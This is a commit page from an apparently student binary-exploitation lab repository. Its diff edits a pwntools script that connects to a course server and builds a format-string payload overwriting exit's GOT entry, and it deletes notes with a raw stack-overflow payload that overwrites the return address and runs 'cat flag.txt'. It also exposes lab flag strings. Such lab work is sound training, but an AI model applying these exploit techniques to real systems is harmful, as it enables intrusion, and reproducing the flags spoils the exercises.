ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

remote

Browse Source
This commit is contained in:
Eggert Jung
2026-02-02 16:05:13 +01:00
parent 71feaaad5a
commit e7a9ea4c8d
2 changed files with 4 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
4/level10/test.py
View File

@@ -15,8 +15,10 @@ print("win : ", hex(win_addr))
#for i in range(1,30): #for i in range(1,30):
#print("##################### ", i) #print("##################### ", i)
p = process(elf.path) #p = process(elf.path)
#p = remote("localhost", 4010) p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
p.sendline(payload.encode())
context.clear(arch = 'amd64') context.clear(arch = 'amd64')
payload = fmtstr_payload(offset=8, writes={exit_got: win_addr}) payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})

7
4/level11/test
View File

@@ -1,7 +0,0 @@
last key
32 byte filler
overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
overwrite rip with address of win
#printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x56\x13\x40\00\00\00\00\00\ncat flag.txt\n'